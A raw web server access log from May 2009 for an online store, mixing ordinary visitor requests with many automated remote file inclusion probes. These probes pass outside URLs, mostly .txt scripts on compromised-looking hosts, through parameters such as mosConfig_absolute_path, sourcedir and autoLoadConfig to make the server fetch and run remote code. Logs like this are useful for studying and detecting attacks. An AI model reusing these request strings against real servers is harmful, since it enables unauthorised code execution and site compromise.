221.139.104.104 - - [19/May/2009:00:03:45 -0400] "GET /logs/?mosConfig_absolute_path=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 200 1954 "-" "Mozilla/5.0"
221.139.104.104 - - [19/May/2009:00:03:45 -0400] "GET /logs/?mosConfig_absolute_path=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 200 1954 "-" "Mozilla/5.0"
221.139.104.104 - - [19/May/2009:00:03:45 -0400] "GET /?mosConfig_absolute_path=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
221.139.104.104 - - [19/May/2009:00:03:45 -0400] "GET /logs/access_log.Q108082900/?mosConfig_absolute_path=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
97.100.66.240 - - [19/May/2009:00:04:02 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L0093764E2591F4007D1D06I+M37+ENG HTTP/1.1" 200 64808 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; .NET CLR 1.0.3705)"
97.100.66.240 - - [19/May/2009:00:04:04 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 200 984 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0093764E2591F4007D1D06I+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; .NET CLR 1.0.3705)"
97.100.66.240 - - [19/May/2009:00:04:04 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 200 1970 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0093764E2591F4007D1D06I+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; .NET CLR 1.0.3705)"
97.100.66.240 - - [19/May/2009:00:04:04 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 200 1531 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0093764E2591F4007D1D06I+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; .NET CLR 1.0.3705)"
97.100.66.240 - - [19/May/2009:00:04:04 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 200 1729 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0093764E2591F4007D1D06I+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; .NET CLR 1.0.3705)"
97.100.66.240 - - [19/May/2009:00:04:04 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 200 1768 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0093764E2591F4007D1D06I+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; .NET CLR 1.0.3705)"
97.100.66.240 - - [19/May/2009:00:04:04 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 200 5036 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0093764E2591F4007D1D06I+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; .NET CLR 1.0.3705)"
97.100.66.240 - - [19/May/2009:00:04:04 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 200 764 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0093764E2591F4007D1D06I+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; .NET CLR 1.0.3705)"
97.100.66.240 - - [19/May/2009:00:04:04 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 200 1459 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0093764E2591F4007D1D06I+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; .NET CLR 1.0.3705)"
97.100.66.240 - - [19/May/2009:00:04:04 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 200 1160 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0093764E2591F4007D1D06I+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; .NET CLR 1.0.3705)"
97.100.66.240 - - [19/May/2009:00:04:05 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 200 1250 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0093764E2591F4007D1D06I+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; .NET CLR 1.0.3705)"
97.100.66.240 - - [19/May/2009:00:04:05 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 200 1367 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0093764E2591F4007D1D06I+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; .NET CLR 1.0.3705)"
97.100.66.240 - - [19/May/2009:00:04:05 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 200 1235 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0093764E2591F4007D1D06I+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; .NET CLR 1.0.3705)"
97.100.66.240 - - [19/May/2009:00:04:05 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 200 2237 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0093764E2591F4007D1D06I+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; .NET CLR 1.0.3705)"
97.100.66.240 - - [19/May/2009:00:04:05 -0400] "GET /images/blend.jpg HTTP/1.1" 200 405 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0093764E2591F4007D1D06I+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; .NET CLR 1.0.3705)"
97.100.66.240 - - [19/May/2009:00:04:05 -0400] "GET /images/pf-a.gif HTTP/1.1" 200 798 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0093764E2591F4007D1D06I+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; .NET CLR 1.0.3705)"
97.100.66.240 - - [19/May/2009:00:04:05 -0400] "GET /images/items/45418015_THUMB.JPG HTTP/1.1" 200 16032 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0093764E2591F4007D1D06I+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; .NET CLR 1.0.3705)"
97.100.66.240 - - [19/May/2009:00:04:05 -0400] "GET /images/items/45419001_THUMB.JPG HTTP/1.1" 200 14901 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0093764E2591F4007D1D06I+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; .NET CLR 1.0.3705)"
97.100.66.240 - - [19/May/2009:00:04:05 -0400] "GET /images/items/45417901_THUMB.JPG HTTP/1.1" 200 14987 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0093764E2591F4007D1D06I+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; .NET CLR 1.0.3705)"
97.100.66.240 - - [19/May/2009:00:04:05 -0400] "GET /images/items/45415001_THUMB.JPG HTTP/1.1" 200 14884 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0093764E2591F4007D1D06I+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; .NET CLR 1.0.3705)"
97.100.66.240 - - [19/May/2009:00:04:06 -0400] "GET /images/items/45415201_THUMB.JPG HTTP/1.1" 200 14626 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0093764E2591F4007D1D06I+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; .NET CLR 1.0.3705)"
97.100.66.240 - - [19/May/2009:00:04:06 -0400] "GET /images/items/TRUSCREWS_THUMB.JPG HTTP/1.1" 200 15579 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0093764E2591F4007D1D06I+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; .NET CLR 1.0.3705)"
97.100.66.240 - - [19/May/2009:00:04:06 -0400] "GET /images/space.gif HTTP/1.1" 200 43 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0093764E2591F4007D1D06I+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; .NET CLR 1.0.3705)"
97.100.66.240 - - [19/May/2009:00:04:06 -0400] "GET /images/next.gif HTTP/1.1" 200 249 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0093764E2591F4007D1D06I+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; .NET CLR 1.0.3705)"
97.100.66.240 - - [19/May/2009:00:04:06 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; .NET CLR 1.0.3705)"
97.100.66.240 - - [19/May/2009:00:04:06 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 200 1296 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0093764E2591F4007D1D06I+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; .NET CLR 1.0.3705)"
97.100.66.240 - - [19/May/2009:00:04:06 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 200 1473 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0093764E2591F4007D1D06I+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; .NET CLR 1.0.3705)"
97.100.66.240 - - [19/May/2009:00:04:06 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 200 1396 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0093764E2591F4007D1D06I+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; .NET CLR 1.0.3705)"
97.100.66.240 - - [19/May/2009:00:04:06 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 200 1354 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0093764E2591F4007D1D06I+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; .NET CLR 1.0.3705)"
97.100.66.240 - - [19/May/2009:00:04:06 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 200 1392 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0093764E2591F4007D1D06I+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; .NET CLR 1.0.3705)"
97.100.66.240 - - [19/May/2009:00:04:06 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 200 1156 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0093764E2591F4007D1D06I+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; .NET CLR 1.0.3705)"
97.100.66.240 - - [19/May/2009:00:04:06 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 200 1097 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0093764E2591F4007D1D06I+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; .NET CLR 1.0.3705)"
97.100.66.240 - - [19/May/2009:00:04:07 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 200 1089 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0093764E2591F4007D1D06I+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; .NET CLR 1.0.3705)"
97.100.66.240 - - [19/May/2009:00:04:07 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 200 1195 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0093764E2591F4007D1D06I+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; .NET CLR 1.0.3705)"
97.100.66.240 - - [19/May/2009:00:04:07 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 200 1110 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0093764E2591F4007D1D06I+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; .NET CLR 1.0.3705)"
211.115.89.68 - - [19/May/2009:00:04:15 -0400] "GET /logs/access_log.Q108062600%20%20/?sourcedir=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
221.139.104.104 - - [19/May/2009:00:04:17 -0400] "GET /?mosConfig_absolute_path=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
221.139.104.104 - - [19/May/2009:00:04:17 -0400] "GET /logs/?mosConfig_absolute_path=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 200 1954 "-" "Mozilla/5.0"
221.139.104.104 - - [19/May/2009:00:04:17 -0400] "GET /logs/access_log.Q108090200%20%20/?mosConfig_absolute_path=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
221.139.104.104 - - [19/May/2009:00:04:21 -0400] "GET /logs/?mosConfig_absolute_path=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 200 1954 "-" "Mozilla/5.0"
221.139.104.104 - - [19/May/2009:00:04:21 -0400] "GET /?mosConfig_absolute_path=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
221.139.104.104 - - [19/May/2009:00:04:21 -0400] "GET /logs/access_log.Q108090200%20%20/?mosConfig_absolute_path=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
97.100.66.240 - - [19/May/2009:00:04:20 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L0093764E2591F4007D1D06I+M37+ENG HTTP/1.1" 200 59525 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; .NET CLR 1.0.3705)"
202.177.22.67 - - [19/May/2009:00:04:21 -0400] "GET /logs/access_log.Q108081500//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://colegiopenacorada.com/xoops_lib/modules/alba.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
97.100.66.240 - - [19/May/2009:00:04:22 -0400] "GET /images/items/9600027_THUMB.JPG HTTP/1.1" 200 2613 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0093764E2591F4007D1D06I+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; .NET CLR 1.0.3705)"
202.177.22.67 - - [19/May/2009:00:04:22 -0400] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://colegiopenacorada.com/xoops_lib/modules/alba.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
202.177.22.67 - - [19/May/2009:00:04:23 -0400] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://colegiopenacorada.com/xoops_lib/modules/alba.txt?? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
209.59.12.99 - - [19/May/2009:00:04:30 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
62.44.79.35 - - [19/May/2009:00:04:32 -0400] "GET /logs/access_log.Q108090500%20%20/?sourcedir=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
221.139.104.104 - - [19/May/2009:00:04:38 -0400] "GET /?mosConfig_absolute_path=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
221.139.104.104 - - [19/May/2009:00:04:38 -0400] "GET /logs/access_log.Q108082900/?mosConfig_absolute_path=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
221.139.104.104 - - [19/May/2009:00:04:38 -0400] "GET /logs/?mosConfig_absolute_path=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 200 1954 "-" "Mozilla/5.0"
62.44.79.35 - - [19/May/2009:00:04:41 -0400] "GET /logs/access_log.Q108111500%20%20/?sourcedir=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
220.79.47.122 - - [19/May/2009:00:04:45 -0400] "GET /logs/?sourcedir=http://www.sexclusiv.eu/uiu.txt?? HTTP/1.1" 200 1954 "-" "Mozilla/5.0"
220.79.47.122 - - [19/May/2009:00:04:45 -0400] "GET /?sourcedir=http://www.sexclusiv.eu/uiu.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
220.79.47.122 - - [19/May/2009:00:04:45 -0400] "GET /logs/access_log.Q108090500/?sourcedir=http://www.sexclusiv.eu/uiu.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
122.116.178.20 - - [19/May/2009:00:04:47 -0400] "GET /?sourcedir=http://www.elvstrom.fr/~citypass/sites/justcars/simple.jpg? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
122.116.178.20 - - [19/May/2009:00:04:47 -0400] "GET /logs/access_log.Q108090500/?sourcedir=http://www.elvstrom.fr/~citypass/sites/justcars/simple.jpg? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
122.116.178.20 - - [19/May/2009:00:04:47 -0400] "GET /logs/?sourcedir=http://www.elvstrom.fr/~citypass/sites/justcars/simple.jpg? HTTP/1.1" 200 1954 "-" "Mozilla/5.0"
81.201.105.162 - - [19/May/2009:00:05:09 -0400] "GET /logs/?sourcedir=http://theblythes.net/cal/mydb?? HTTP/1.1" 200 1954 "-" "Mozilla/5.0"
81.201.105.162 - - [19/May/2009:00:05:09 -0400] "GET /?sourcedir=http://theblythes.net/cal/mydb?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
81.201.105.162 - - [19/May/2009:00:05:09 -0400] "GET /logs/access_log.Q108090500/?sourcedir=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
91.121.210.42 - - [19/May/2009:00:05:15 -0400] "GET /logs/access_log.Q108082900/?mosConfig_absolute_path=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
91.121.210.42 - - [19/May/2009:00:05:15 -0400] "GET /logs/?mosConfig_absolute_path=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 200 1954 "-" "Mozilla/5.0"
91.121.210.42 - - [19/May/2009:00:05:15 -0400] "GET /?mosConfig_absolute_path=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
193.25.197.91 - - [19/May/2009:00:05:26 -0400] "GET /logs/access_log.Q108052200/?sourcedir=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
221.139.104.104 - - [19/May/2009:00:05:36 -0400] "GET /logs/?mosConfig_absolute_path=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 200 1954 "-" "Mozilla/5.0"
221.139.104.104 - - [19/May/2009:00:05:36 -0400] "GET /logs/access_log.Q108090200/?mosConfig_absolute_path=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
221.139.104.104 - - [19/May/2009:00:05:36 -0400] "GET /logs/access_log.Q108082900/?mosConfig_absolute_path=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
221.139.104.104 - - [19/May/2009:00:05:36 -0400] "GET /?mosConfig_absolute_path=http://www.kyokushin.hu/fx29id2.txt??? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
122.116.178.20 - - [19/May/2009:00:06:06 -0400] "GET /logs/access_log.Q108111500/?sourcedir=http://www.elvstrom.fr/~citypass/sites/justcars/simple.jpg? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
220.79.47.122 - - [19/May/2009:00:06:25 -0400] "GET /logs/access_log.Q108111500/?sourcedir=http://www.sexclusiv.eu/uiu.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
74.52.2.130 - - [19/May/2009:00:06:31 -0400] "GET /logs/access_log.Q108090500%20%20/?sourcedir=http://www.sexclusiv.eu/uiu.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
74.52.2.130 - - [19/May/2009:00:06:31 -0400] "GET /logs/access_log.Q108111500%20%20/?sourcedir=http://www.sexclusiv.eu/uiu.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
74.52.2.130 - - [19/May/2009:00:06:45 -0400] "GET /logs/access_log.Q108090500%20%20/?sourcedir=http://www.sexclusiv.eu/uiu.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
74.52.2.130 - - [19/May/2009:00:06:46 -0400] "GET /logs/access_log.Q108111500%20%20/?sourcedir=http://www.sexclusiv.eu/uiu.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
207.44.232.81 - - [19/May/2009:00:06:47 -0400] "GET /logs/access_log.Q108052200/?sourcedir=http://www.elvstrom.fr/~citypass/sites/justcars/simple.jpg? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
74.52.2.130 - - [19/May/2009:00:06:54 -0400] "GET /logs/access_log.Q108052200/?sourcedir=http://www.sexclusiv.eu/uiu.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
222.122.26.5 - - [19/May/2009:00:07:15 -0400] "GET /logs/access_log.Q109020100//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
222.122.26.5 - - [19/May/2009:00:07:15 -0400] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
222.122.26.5 - - [19/May/2009:00:07:16 -0400] "GET /logs/access_log.Q109013100//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
222.122.26.5 - - [19/May/2009:00:07:16 -0400] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
220.79.47.122 - - [19/May/2009:00:07:24 -0400] "GET /logs/access_log.Q108090500%20%20/?sourcedir=http://www.sexclusiv.eu/uiu.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
207.44.232.81 - - [19/May/2009:00:07:47 -0400] "GET /logs/access_log.Q108090500%20%20/?sourcedir=http://www.elvstrom.fr/~citypass/sites/justcars/simple.jpg? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
74.52.2.130 - - [19/May/2009:00:07:51 -0400] "GET /logs/access_log.Q108090500%20%20/?sourcedir=http://www.sexclusiv.eu/uiu.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
220.79.47.122 - - [19/May/2009:00:07:56 -0400] "GET /logs/access_log.Q108062600%20%20/?sourcedir=http://www.sexclusiv.eu/uiu.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
122.116.178.20 - - [19/May/2009:00:08:01 -0400] "GET /logs/access_log.Q108090500%20%20/?sourcedir=http://www.elvstrom.fr/~citypass/sites/justcars/simple.jpg? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
122.116.178.20 - - [19/May/2009:00:08:01 -0400] "GET /logs/access_log.Q108111500%20%20/?sourcedir=http://www.elvstrom.fr/~citypass/sites/justcars/simple.jpg? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
207.44.232.81 - - [19/May/2009:00:08:08 -0400] "GET /logs/access_log.Q108111500%20%20/?sourcedir=http://www.elvstrom.fr/~citypass/sites/justcars/simple.jpg? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
202.177.22.67 - - [19/May/2009:00:08:50 -0400] "GET /logs/access_log.Q108081000//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://colegiopenacorada.com/xoops_lib/modules/alba.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
74.52.2.130 - - [19/May/2009:00:08:57 -0400] "GET /logs/access_log.Q108111500%20%20/?sourcedir=http://www.sexclusiv.eu/uiu.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
200.32.100.130 - - [19/May/2009:00:09:25 -0400] "GET /logs/access_log.Q108090500%20%20/?sourcedir=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
200.32.100.130 - - [19/May/2009:00:09:25 -0400] "GET /logs/access_log.Q108111500%20%20/?sourcedir=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
209.59.12.99 - - [19/May/2009:00:09:31 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
211.115.89.68 - - [19/May/2009:00:11:08 -0400] "GET /logs/access_log.Q108090100//templates/head.php?APB_SETTINGS[template_path]=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
